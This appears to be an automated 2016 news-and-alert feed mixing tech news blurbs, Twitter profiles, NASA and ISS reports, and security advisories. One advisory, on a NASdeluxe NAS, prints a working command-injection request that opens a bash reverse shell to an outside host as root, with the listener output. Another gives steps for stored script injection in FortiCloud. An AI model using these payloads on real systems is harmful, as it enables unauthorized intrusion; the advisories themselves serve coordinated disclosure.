On this day 25 years ago, August 6, 1991, the world's first website went live to the public from a lab in the Swiss Alps. So Happy 25th Birthday, WWW! It's the Silver Jubilee of the world's first website. The site was created by Sir Tim Berners-Lee, the father of the World Wide Web (WWW), and was dedicated to information on the World Wide Web project. The world's first website, which ran on
from The Hacker News http://ift.tt/2aB0lT1
via IFTTT
Pokémon GO has become the world’s most popular mobile game since its launch in July, but not everyone loves it. Pokémon GO has officially been banned in Iran. The Iranian High Council of Virtual Spaces – the country's official body that oversees online activity – has prohibited the use of the Pokémon GO app within the country due to unspecified "security concerns," BBC reports. <!-- adsense
from The Hacker News http://ift.tt/2b0LF5J
via IFTTT
John R. Patterson Customer Service Guru, Leadership Consultant, Office Construction & Relocation Expert, Best-selling Author, In-demand Speaker, Husband and Father of 5.
Atlanta, Georgia
http://t.co/mxTESELpDp
Following: 5270 - Followers: 7481
August 06, 2016 at 02:26AM via Twitter http://twitter.com/johnrpatt
On July 31, 1971, Apollo 15 astronauts Jim Iwrin and Dave Scott deployed the first Lunar Roving Vehicle on the Moon. Using it to explore their Hadley-Apennine landing site they spent nearly three days on the Moon while Al Worden orbited above. This digitally stitched panorama shows Scott examining a boulder on the slope of 3.5 kilometer high Mons Hadley Delta to the left of their electric-powered, four-wheel drive vehicle. The sun at his back, Irwin casts the strong shadow to the rover's right. The panoramic view extends farther right to the sunward direction, over Hadley Rille and lunar terrain, revealed in harsh, unfiltered sunlight. In total, the rover traversed 28 kilometers (17 miles) on the lunar surface. The Apollo 15 mission returned about 76 kilograms of moon rocks to planet Earth. via NASA http://ift.tt/2aXWG6w
On 04/08/16 17:46, Pedro Ribeiro wrote: > tl;dr > > Lots of RCE, hardcoded credentials, stack buffer overflow and > information disclosure in the Nuuo NVRmini and other network video > recorders of the same vendor. > These vulnerabilities also affect the NETGEAR Surveillance app (which > can be installed on the NETGEAR ReadyNAS). > > See the full advisory including PoC and exploits below, or at my github > (http://ift.tt/2aY9fg6). > > Metasploit modules have been submitted for vulns #1, #2 and #3: > http://ift.tt/2aXHszf > http://ift.tt/2aABQr2 > http://ift.tt/2aXHI1d > > Thanks to CERT/CC for helping me disclose this vulnerabilities - see > http://ift.tt/2aABmRN for their advisory. > > Regards, > Pedro > > ============================== > >>> Fix: > NETGEAR and Nuuo did not respond to CERT/CC coordination efforts (see > Timeline below), so no fix is available. > Do not expose any of these devices to the Internet or any networks with > unstrusted hosts. > > Timeline: > 28.02.2016: Disclosure to CERT/CC. > 27.04.2016: Requested status update from CERT - they did not receive any > response from vendors. > 06.06.2016: Requested status update from CERT - still no response from > vendors. > Contacted Nuuo and NETGEAR directly. NETGEAR responded with > their "Responsible Disclosure Guidelines", to which I did not agree and > requested them to contact CERT if they want to know the details about > the vulnerabilities found. No response from Nuuo. > 13.06.2016: CERT sent an update saying that NETGEAR has received the > details of the vulnerabilities, and they are attempting to contact Nuuo > via alternative channels. > 07.07.2016: CERT sent an update saying that they have not received any > follow up from both Nuuo and NETGEAR, and that they are getting ready > for disclosure. > 17.07.2016: Sent an email to NETGEAR and Nuuo warning them that > disclosure is imminent if CERT doesn't receive a response or status > update. No response received. > 01.08.2016: Sent an email to NETGEAR and Nuuo warning them that > disclosure is imminent if CERT doesn't receive a response or status > update. No response received. > 04.08.2016: Coordinated disclosure with CERT. > > >>> References: > [1] http://ift.tt/2aABmRN > > > ================ > Agile Information Security Limited > http://ift.tt/1JewOIU >>> Enabling secure digital business >> Forgot to mention - these are actually "0 days" since the vendors didn't bother to respond or issue fixes - see timeline above. Regards, Pedro
Hi, Description of the potential vulnerability: Severity: Medium Affected versions: L(5.0/5.1), M(6.0) Reported on: May 11, 2016 Disclosure status: Privately disclosed. The vulnerability in SmartCall Activity components of Telecom application can make crash and reboot a device when the malformed serializable object is passed. Fix: http://ift.tt/2aOZell SVE-2016-6244: Possible Privilege Escalation in telecom Sincerely, Zhaozhanpeng(0xr0ot)
Description of the potential vulnerability: Severity: Medium Affected versions: L(5.0/5.1), M(6.0) Reported on: May 11, 2016 Disclosure status: Privately disclosed. A vulnerability in SpamCall Activity components of Telecom application can make crash and reboot a device when the malformed serializable object is passed. Fix: http://ift.tt/2aOZell SVE-2016-6242: Possible Privilege Escalation in telecom Sincerely, Zhaozhanpeng(0xr0ot)
Advisory ID: SYSS-2016-065 Product: NASdeluxe NDL-2400r Vendor: Starline Computer GmbH Affected Version(s): 2.01.10 Tested Version(s): 2.01.09 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: High Solution Status: no fix (product has reached EOL since 3 years) Vendor Notification: 2016-07-04 Public Disclosure: 2016-08-03 CVE Reference: Not assigned Author of Advisory: Klaus Eisentraut, SySS GmbH, http://ift.tt/1Nxy8d7 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The product "NASdeluxe NDL-2400r" [3] is vulnerable to OS Command Injection as root. No credentials are required to exploit this vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details / Proof-of-Concept: The language parameter in the web interface login request of the product "NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root. The SySS GmbH sent the following HTTPS request to the webinterface: ~~~~~ POST /usr/usrgetform.html?name=index HTTP/1.1 Host: 192.168.1.1 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 97 lang=||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen ~~~~~ After sending the request, a reverse shell connected back: ~~~~~ # nc -lvvp 443 Listening on any address 443 (https) Connection from 192.168.1.1:49070 bash: no job control in this shell bash-3.00# whoami root bash-3.00# cat /img/version 2.01.09 ~~~~~ The tested firmware version was 2.01.09. The most current version is 2.01.10 according to the web page of the vendor [3]. However there are no hints of a security update in the release notes [4]. Thus, the SySS GmbH assumes that this vulnerability is likely also present in the most current firmware version from 2009-10-22. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The product has reached end-of-life (EOL) status since more than three years. Thus, no patch will be provided by the vendor. It is highly recommended to migrate to one of the newer and still supported NAS solutions which are (according to Starline Computer GmbH) not affected by this vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2016-06-29: Vulnerability discovered 2016-07-04: asked info@starline.de for contact person (no answer) 2016-07-22: sent this advisory to info@starline.de 2016-07-22: response from vendor: won't fix (product reached EOL >3 years) 2016-08-03: public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] SySS GmbH, SYSS-2016-065 http://ift.tt/2aAzgkW [2] SySS GmbH, SySS Responsible Disclosure Policy http://ift.tt/2aSI35b [3] NASdeluxe Homepage http://ift.tt/2avypSy [4] NDL-2400R Firmware Release Notes http://ift.tt/2aXGF10 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Klaus Eisentraut of the SySS GmbH. E-Mail: klaus.eisentraut@syss.de Public Key: http://ift.tt/2avzidS Key ID: 0xBAC677AE Key Fingerprint: F5E8 E8E1 A414 4886 0A8B 0411 DAB0 4DB5 BAC6 77AE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://ift.tt/HGsLr6
GrowthHIT Growth on Demand. Hire an Elite Growth Team in 90 Seconds on https://t.co/l5dJik0NEK. #SEO #GrowthHacking #CRO #Startup #Launch #EmailMarketing #PPC
New York, NY
https://t.co/rruuhtBYVm
Following: 958 - Followers: 1782
August 05, 2016 at 03:36PM via Twitter http://twitter.com/GrowthHit
Webgrow UK I'm A Family Man Who Loves Travel And Helping E-Commerce Owners Get More Sales & Conversions: Magento, PrestaShop and Woocommerce https://t.co/2HAu0koCk1
Aylesbury, UK
https://t.co/uDf4RFJint
Following: 3792 - Followers: 4349
August 05, 2016 at 03:36PM via Twitter http://twitter.com/webgrowuk
[resolved] Allow anonymous event submitters to edit their own event (2 posts). kimdebling. Member Posted 17 hours ago #. Hi,. I've set up my website ...
from Google Alert - anonymous http://ift.tt/2annhKb
via IFTTT
Fluid Shifts Operations In the Service Module: With ground team assistance, crewmembers continued supporting Fluid Shifts Imaging exams that began yesterday by configuring the Optical Coherence Tomography (OCT) and the Distortion Product Otoacoustic Emission (DPOAE) hardware before completing a DPOAE test, OCT exam, and a Tonometry exam. The purpose of this investigation is to characterize the space flight-induced fluid shift, including intra- and extravascular shifts, intra- and extracellular shifts, changes in total body water and lower vs. upper body shifts. Noninvasive techniques are used to assess arterial and venous dimensions and flow parameters, ocular pressure and structure, and changes in intracranial pressure. Lower body negative pressure is being investigated for its ability to mitigate some of the effects of the space flight-induced fluid shift. Results from this investigation are expected to help define the causes of the ocular structure and vision changes associated with long duration space flight, and assist in the development of countermeasures. NanoRacks External Platform (NREP) and Gumstix Installation: The NREP was prepared for installation on the Japanese Experiment Module (JEM) Airlock (JEMAL) Slide Table. During the NREP assembly, the NanoRacks-Gumstix experiment was installed onto the NREP. Two crewmembers installed NREP on JEMAL Slide Table. One crewmember held NREP in place to keep the capture cones aligned with the NREP receptacles and the other operated the capture mechanism. The Slide Table was then retracted from the JEM Pressurized Module (JPM) side into the JEMAL and the inner hatch was closed. The NanoRacks External Platform represents the first external commercial research capability for the testing of scientific investigations, sensors, and electronic components in space. The NanoRacks External Platform will be installed on a payload required basis on the outside of the ISS on the JEM External Facility (JEM-EF). The NanoRacks-Evaluation of Gumstix Performance in Low-Earth Orbit (NanoRacks-Gumstix) investigation tests small computers called Gumstix modules, which are based on open-source software, as an alternative off-the-shelf option for use in space. The investigation studies whether the Gumstix microprocessors can withstand the radiation environment on board the ISS. The NREP will be deployed from the JEMAL and installed on the JEM-EF tomorrow. Multi-Omics Operations: The crew supported the Japan Aerospace Exploration Agency (JAXA) Multi-Omics investigation by collecting saliva samples and inserting them into a Box Module in the Minus Eighty-degree Freezer for ISS (MELFI). The investigation evaluates the impacts of space environment and prebiotics on astronauts’ immune function by combining the data obtained from the measurements of changes in the microbiological composition, metabolites profiles, and the immune system. Space Headaches: The crew completed the European Space Agency (ESA) Space Headaches questionnaire to provide information that may help in the development of methods to alleviate associated symptoms and improvement in the well-being and performance of crew members in space. Headaches during space flight can negatively affect mental and physical capacities of crew members which can influence performance during a space mission. Habitability Human Factors Directed Observations: The crew recorded and submitted a walk-through video documenting observations of life onboard ISS, providing insight related to human factors and habitability. The Habitability investigation collects observations about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need. Extravehicular Activity (EVA) Tool Configuration: In preparation for the EVA currently planned for August 19, the crew gathered and configured required tools. Today’s Planned Activities All activities were completed unless otherwise noted. Multi Omics (MO) Saliva Sample Collection Multi Omics (MO) MELFI Sample Insertion Multi Omics (MO) Equipment Stowage Multi Omics (MO) Questionnaire Completion Window Shutter Close FLUID SHIFTS. Comm configuration for the experiment / r/g 9995 CASKAD. Manual Mixing in Bioreactor / r/g 2888 Acoustic Dosimeter Setup Day 3 FLUID SHIFTS. Gathering and Connecting Equipment for TV coverage OTKLIK. Equipment Check / r/g 1588 FLUID SHIFTS. Big Picture Words Review Verification of ИП-1 Flow Sensor Position BRI log download from RSS1 VIBROLAB. Monitoring hardware activation / r/g 2981 FLUID SHIFTS. Connecting OCT Laptop to RS BRI and HRF PC to ППС-26 (instead of RSE-Med) r/g 2983 FLUID SHIFTS. OCT Power up in SM FLUID SHIFTS. CCFP Activation and Settings Adjustments in RS СОЖ Maintenance US EVA Tool Preparation FLUID SHIFTS. DPOAE Setup in SM NREP. NANORACKS External Platform Assembly FLUID SHIFTS. TONO Hardware setup in SM FLUID SHIFTS. Chibis Setup / r/g 2982 FLUID SHIFTS. Operator Assistance with Chibis and Gamma-1 r/g 2982 FLUID SHIFTS. Gathering Data in SM EVA Tool Config Vacuum cleaning of ВТ7 screens on ГЖТ4 behind FGB panel 108 FLUID SHIFTS. Copying Data from CCFP/DPOAE devices and their deactivation in RS FLUID SHIFTS. Chibis Closeout Ops / r/g 2982 FLUID SHIFTS. Crew Onboard Support System (КСПЭ) Hardware Deactivation and Closing Application FLUID SHIFTS. TONO SM Stowage FLUID SHIFTS. OCT Power off in SM FLUID SHIFTS. Restore nominal comm config FLUID SHIFTS. Disconnecting of Laptop OCT, HRF and connecting RSE-Med r/g 2984 FLUID SHIFTS. Disconnecting US converter from СУБА / r/g 2984 Measuring SM interior panel elements / r/g 2991 JEMAL Slide Table (ST) Extension to JPM Side NREP. Mounting Slide Table NREP. Assistance in Mounting Slide Table JEMAL JEM Airlock Slide Table Retraction from JPM JEMAL Depress and Vent PAO Hardware Setup Crew Prep for PAO PAO Event Progress 433 (DC1) Transfers and IMS Ops / Progress 433 Transfers + r/g 2834, 2835, 2929, 2961 FLUID SHIFTS. OCT Hardware Stowage EHS CFM In-flight Microbiology Water Analysis FLUID SHIFTS. CCFP/PC Stowage VIBROLAB Copy and Downlink Data / r/g 2981 DRAGON. Transfers Re-Packing fasteners into fasteners and tool kit delivered on Progress 433 / r/g 2990 FLUID SHIFTS. Hardware Gathering before Transfer to USOS FLUID SHIFTS Hardware setup to work with Dilution Measures Setup FLUID SHIFTS. Hardware Transfer to USOS FLUID SHIFTS. Cable removal BLB Rotor Inspection FLUID SHIFTS. OCT and Laptop Setup Removal/Installation of Signal Converter Unit (БПС) devices in TORU work station r/g 2992 Dragon Cargo Operations Conference FLUID SHIFTS. Ultrasound 2 Setup and Activation Demate telemetry […]
from ISS On-Orbit Status Report http://ift.tt/2azWSaD
via IFTTT
Forget about security! It turns out that the Chip-and-PIN cards are just as easy to clone as magnetic stripe cards. It took researchers just a simple chip and pin hack to withdraw up to $50,000 in cash from an ATM in America in under 15 minutes. We have been told that EMV (Europay, MasterCard and Visa) chip-equipped cards provides an extra layer of security which makes these cards more secure
from The Hacker News http://ift.tt/2azMWAP
via IFTTT
Over two weeks after the shutdown of Kickass Torrents and arrest of its admin in Poland, the world's biggest BitTorrent meta-search engine Torrentz.eu has apparently shut down its operation. The surprise shutdown of Torrentz marks the end of an era. <!-- adsense --> Torrentz.eu was a free, fast and powerful meta-search engine that hosted no torrents of its own, but combined results from
from The Hacker News http://ift.tt/2aJ3D8h
via IFTTT
So finally, Apple will pay you for your efforts of finding bugs in its products. While major technology companies, including Microsoft, Facebook and Google, have launched bug bounty programs over last few years to reward researchers and hackers who report vulnerabilities in their products, Apple remained a holdout. But, not now. On Thursday, Apple announced at the Black Hat security
from The Hacker News http://ift.tt/2aCAs91
via IFTTT
Document Title: =============== FortiCloud - (Reports Summary) Multiple Persistent Vulnerabilities References (Source): ==================== http://ift.tt/2aW1Lfo Release Date: ============= 2016-08-05 Vulnerability Laboratory ID (VL-ID): ==================================== 1735 Common Vulnerability Scoring System: ==================================== 3.6 Product & Service Introduction: =============================== FortiCloud is a hosted solution that helps you manage your FortiGate® network and your FortiAP® wireless infrastructure. The perfect companion to all your FortiGate & FortiWiFi units. FortiCloud is a hosted security and wireless infrastructure management solution and log retention service for FortiGate, FortiWiFi and FortiAP devices. It gives you centralized reporting, traffic analysis, configuration management, and log retention without the need for additional hardware and software, with the following feature set: ( Copy of the Vendor Homepage: http://ift.tt/2aW2nlu ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple application-side validation vulnerabilities in the official Forticloud online service web-application. Vulnerability Disclosure Timeline: ================================== 2016-02-17: Researcher Notification & Coordination (Lawrence Amer) 2016-02-18: Vendor Notification (Fortguard PSIRT Security Team) 2016-03-02: Vendor Response/Feedback (Fortguard PSIRT Security Team) 2016-07-04: Vendor Fix/Patch (Fortinet Developer Team) 2016-07-22: Security Acknowledgements (Fortguard PSIRT Security Team) 2016-08-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple persistent cross site scripting web vulnerabilities has been discoverd in the offical version of Forticloud online service web-application. The security vulnerability allows remote attackers to inject own malicious script codes on the application-side of the affected online service module. The persistent input validation web vulnerabilities are located in the `Template - Summary` module of the main `Reports` module. The encoding of the add inputs in the title, description and charts is broken. Remote attackers with low or privileged web-application user accounts are able to inject own malicious script codes on the application-side of the reports - summary module. The request method to inject is POST and the attack vector is located on the application-side of the forticloud service. The injection point are the title, description and charts add input fields and the execution point is the reports - summary module of the web-application. The security risk of the persistent validation vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.6. Exploitation of the persistent input validation web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] FortiCloud - Reports - Templates Vulnerable Input(s): [+] Reports Main title [+] Reports Descriptions [+] Report Charts Vulnerable Parameter(s): [+] ext-gen2538, ext-gen2458 & gwt-HTML [+] fc-rpt-description [+] fc-rpt-title [+] fc-rpt-chart Affected Module(s): [+] Summary (Main.html - Index) Proof of Concept (PoC): ======================= The application-side web vulnerabilities can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the forticloud appliance web-application and login 2. Open the reports > templates module 3. Switch to Summary Reports 4. Edit existing or Add a new own title , description or chart 5. Inject as name value a script code payload (javascript) Note: >"